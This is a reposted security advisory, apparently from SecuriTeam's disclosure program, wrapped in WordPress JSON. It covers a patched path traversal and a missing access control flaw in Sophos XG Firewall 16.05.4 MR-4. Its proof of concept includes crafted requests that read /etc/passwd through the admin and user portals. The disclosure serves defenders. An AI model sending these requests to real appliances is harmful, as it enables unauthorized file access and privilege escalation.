{"id":7986,"date":"2017-06-19T14:19:37","date_gmt":"2017-06-19T22:19:37","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/06\/19\/news-1767\/"},"modified":"2017-06-19T14:19:37","modified_gmt":"2017-06-19T22:19:37","slug":"news-1767","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/06\/19\/news-1767\/","title":{"rendered":"SSD Advisory \u2013 Sophos XG Firewall Path Traversal"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 19 Jun 2017 16:17:18 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3253\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3253');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describe two (2) vulnerabilities, a Path Traversal and a Missing Function Level Access Control, in Sophos XG Firewall 16.05.4 MR-4.<\/p>\n<p>Sophos XG Firewall provides &#8220;unprecedented visibility into your network, users, and applications directly from the all-new control center. You also get rich on-box reporting and the option to add Sophos iView for centralized reporting across multiple firewalls&#8221;.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> The vendor has released patches to address this vulnerability:<br \/> &#8220;The patches were released as part of SFOS 16.05.5 MR5:<br \/> <a href=\"https:\/\/community.sophos.com\/products\/xg-firewall\/b\/xg-blog\/posts\/sfos-16-05-5-mr5-released\" target=\"_blank\" rel=\"noopener\">https:\/\/community.sophos.com\/products\/xg-firewall\/b\/xg-blog\/posts\/sfos-16-05-5-mr5-released<\/a><\/p>\n<p>Our internal bug number was NC-18958, mentioned in the changelog&#8221;<\/p>\n<p><span id=\"more-3253\"><\/span><\/p>\n<p><strong>Vulnerabilities Details<\/strong><br \/> The Sophos XG Firewall hosts 2 different web portals. The first is the web administration portal used to manage the firewall (Sophos XG Fireweal portal), the second is the &#8220;User Portal&#8221; used to unprivileged user to access to a restricted group of function like to trace their traffic quotas, to see SMTP quarantined mail and to download authentication client.<\/p>\n<p>The appliance has a web download function in Sophos XG Fireweal portal to allow downloading of a range of file like, logs and certificate keys.<\/p>\n<p>Crafting the download request and adding a path traversal vector to it, an authenticated user, can use this function to download files that are outside the normal scope of the download feature (including sensitive files).<\/p>\n<p>In addition, the function can be called from a low privileged user, a user that is logged on to the User Portal (i.e. Missing Function Level Access Control), a combinations of these two vulnerabilities can be used to compromise the integrity of the server, by allowing a User Portal to elevate his privileges.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> Log in the Sophos XG Firewall admin portal<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/1.png\" data-slb-active=\"1\" data-slb-asset=\"1371415794\" data-slb-internal=\"0\" data-slb-group=\"3253\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3254\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/1-300x158.png\" alt=\"\" width=\"300\" height=\"158\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/1-300x158.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/1-768x404.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/1.png 984w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Using developer tools of Firefox (F12) or analyzing the html code of the loaded page (Cyberoam.c$rFt0k3n parameter), extract the <em>csrf<\/em> code.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/2.png\" data-slb-active=\"1\" data-slb-asset=\"598790767\" data-slb-internal=\"0\" data-slb-group=\"3253\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3265\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/2-300x220.png\" alt=\"\" width=\"300\" height=\"220\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/2-300x220.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/2-768x564.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/2-1024x752.png 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/2.png 1222w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/3.png\" data-slb-active=\"1\" data-slb-asset=\"1136213120\" data-slb-internal=\"0\" data-slb-group=\"3253\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3263\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/3-300x179.png\" alt=\"\" width=\"300\" height=\"179\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/3-300x179.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/3-768x457.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/3.png 845w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Open the Hackbar or use other tools to send a new crafted request:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59484df83d118440295657\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> URL https:\/\/192.168.0.188:4444\/webconsole\/Controller?filename=..\/..\/..\/etc\/passwd&amp;mode=4010  \tpostdata csrf=&lt;== THE PARAMETER YOU HAVE FOUND ==&gt;  \treferrer https:\/\/192.168.0.188:4444\/webconsole\/webpages\/index.jsp<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0007 seconds] -->  <\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/4.png\" data-slb-active=\"1\" data-slb-asset=\"1152048670\" data-slb-internal=\"0\" data-slb-group=\"3253\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3264\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/4-300x243.png\" alt=\"\" width=\"300\" height=\"243\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/4-300x243.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/4-768x623.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/4-1024x831.png 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/4.png 1229w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>This will start the download of the \/etc\/passwd file:<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/6.png\" data-slb-active=\"1\" data-slb-asset=\"2048160543\" data-slb-internal=\"0\" data-slb-group=\"3253\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3262\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/6-300x223.png\" alt=\"\" width=\"300\" height=\"223\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/6-300x223.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/6-768x572.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/6.png 862w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/5.png\" data-slb-active=\"1\" data-slb-asset=\"459010444\" data-slb-internal=\"0\" data-slb-group=\"3253\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3261\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/5-300x135.png\" alt=\"\" width=\"300\" height=\"135\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/5-300x135.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/5-768x345.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/5-1024x460.png 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/5.png 1195w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Create from the admin portal an user of the User Portal (Authentication &gt; User &gt; Add)<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/7.png\" data-slb-active=\"1\" data-slb-asset=\"1015616442\" data-slb-internal=\"0\" data-slb-group=\"3253\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3259\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/7-300x262.png\" alt=\"\" width=\"300\" height=\"262\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/7-300x262.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/7-768x670.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/7.png 1015w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/8.png\" data-slb-active=\"1\" data-slb-asset=\"185036295\" data-slb-internal=\"0\" data-slb-group=\"3253\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3260\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/8-300x79.png\" alt=\"\" width=\"300\" height=\"79\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/8-300x79.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/8-768x203.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/8.png 920w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Login in the User Portal using the new user<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/9.png\" data-slb-active=\"1\" data-slb-asset=\"1274589944\" data-slb-internal=\"0\" data-slb-group=\"3253\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3257\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/9-300x203.png\" alt=\"\" width=\"300\" height=\"203\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/9-300x203.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/9-768x520.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/9.png 824w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Using developer tools of Firefox or analyzing the html code of the loaded page (Cyberoam.c$rFt0k3n parameter), extract the csrf code.<\/p>\n<p>Open the hack bar or use other tools to send a new crafted request:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59484df83d124299095671\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> URL https:\/\/192.168.0.188\/userportal\/Controller?filename=..\/..\/..\/etc\/passwd&amp;mode=4010&amp;json=%7B%22lang%22%3A%220%22%7D  \tpostdata csrf=&lt;== THE PARAMETER YOU HAVE FOUND ==&gt;  \treferrer https:\/\/192.168.0.188\/userportal\/webpages\/myaccount\/index.jsp<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59484df83d124299095671-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59484df83d124299095671-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59484df83d124299095671-3\">3<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59484df83d124299095671-1\"><span class=\"crayon-e\">URL <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/192.168.0.188\/userportal\/Controller?filename=..\/..\/..\/etc\/passwd&amp;mode=4010&amp;json=%7B%22lang%22%3A%220%22%7D<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59484df83d124299095671-2\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">postdata <\/span><span class=\"crayon-v\">csrf<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&lt;=<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">THE <\/span><span class=\"crayon-e\">PARAMETER <\/span><span class=\"crayon-e\">YOU <\/span><span class=\"crayon-e\">HAVE <\/span><span class=\"crayon-v\">FOUND<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59484df83d124299095671-3\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">referrer <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/192.168.0.188\/userportal\/webpages\/myaccount\/index.jsp<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0006 seconds] -->  <\/p>\n<p>This will start the download<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/10.png\" data-slb-active=\"1\" data-slb-asset=\"2001243235\" data-slb-internal=\"0\" data-slb-group=\"3253\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3258\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/10-300x153.png\" alt=\"\" width=\"300\" height=\"153\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/10-300x153.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/10-768x393.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/10-1024x523.png 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/10.png 1217w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/11.png\" data-slb-active=\"1\" data-slb-asset=\"1260161894\" data-slb-internal=\"0\" data-slb-group=\"3253\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3255\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/11-300x183.png\" alt=\"\" width=\"300\" height=\"183\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/11-300x183.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/11-768x470.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/11-1024x626.png 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/11.png 1210w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/pf-button.gif\" alt=\"Print Friendly\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3253\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/1-300x158.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 19 Jun 2017 16:17:18 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describe two (2) vulnerabilities, a Path Traversal and a Missing Function Level Access Control, in Sophos XG Firewall 16.05.4 MR-4. Sophos XG Firewall provides &#8220;unprecedented visibility into your network, users, and applications directly from the all-new control center. You also get rich on-box reporting and the option to add Sophos &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3253\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Sophos XG Firewall Path Traversal<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11680,12077,10757],"class_list":["post-7986","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-directory-traversal","tag-remote-file-inclusion","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7986","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=7986"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7986\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=7986"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=7986"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=7986"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}